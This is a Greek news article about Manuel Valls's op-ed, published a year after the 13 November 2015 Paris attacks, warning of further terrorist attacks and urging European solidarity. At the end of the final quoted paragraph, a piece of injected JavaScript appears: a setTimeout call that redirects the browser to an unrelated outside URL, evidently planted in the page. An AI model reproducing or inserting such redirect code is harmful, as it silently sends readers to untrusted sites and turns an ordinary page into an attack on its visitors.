Βαλς: Η τρομοκρατία θα μας πλήξει και πάλι, αλλά οι Ευρωπαίοι θα τη νικήσουμε

0
3

 

«Έναν χρόνο μετά τις 13 Νοεμβρίου, μετρώ τα ερωτήματα που υπάρχουν στις κοινωνίες μας. Είναι ανήσυχες. Τους οφείλουμε την αλήθεια. Ναι, η τρομοκρατία θα μας πλήξει και πάλι. Όμως ναι, έχουμε όλους τους πόρους για να αντισταθούμε και όλη τη δύναμη για να νικήσουμε. Εμείς, οι Ευρωπαίοι, θα νικήσουμε την ισλαμιστική τρομοκρατία», γράφει ο Βαλς σε άρθρο αυτό που δημοσιεύεται ταυτόχρονα από τις εφημερίδες El Pais, La Repubblica, The Guardian, Le Soir, La Tribune de Geneve και Die Welt, έναν χρόνο μετά τις επιθέσεις της 13ης Νοεμβρίου στο Παρίσι.

Τους τελευταίους μήνες, ο Βαλς επανέλαβε πολλές φορές πως η Γαλλία θα γίνει ενδεχομένως στόχος νέων επιθέσεων, καθώς από τον Ιανουάριο 2015, η χώρα έχει πληγεί από πολλές τζιχαντιστικές επιθέσεις.

Επισημαίνοντας ότι «η απειλή είναι πράγματι παρούσα, βαριά και διαρκής» και εκτιμώντας πως αφορά «σε διαφορετικούς βαθμούς όλες τις χώρες της Ευρώπης», ο Βαλς τις καλεί «να πιαστούν από το χέρι» για την ασφάλειά τους.

«Κι αυτό πολύ περισσότερο που οι ΗΠΑ αναμιγνύονται ολοένα και λιγότερο στις υποθέσεις του κόσμου. Η Ευρώπη δεν μπορεί πλέον να εξιλεώνεται από τον αμερικανό σύμμαχό της και να καταφεύγει πίσω του», υπογραμμίζει.

Ο Μανουέλ Βαλς απευθύνεται επίσης στις οικογένειες των θυμάτων, την παραμονή των επίσημων εκδηλώσεων μνήμης για τα θύματα των τζιχαντιστικών επιθέσεων της 13ης Νοεμβρίου 2015.

«Δεν περνάει ούτε μια ημέρα χωρίς να σκεφτώ τα 130 θύματα της 13ης Νοεμβρίου, τις εκατοντάδες των τραυματιών, όλα τα άλλα θύματα της τρομοκρατίας, τις οικογένειές τους. (…) Αύριο η Γαλλία, ενωμένη στη μνήμη, θα προσευχηθεί», υπογραμμίζει. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here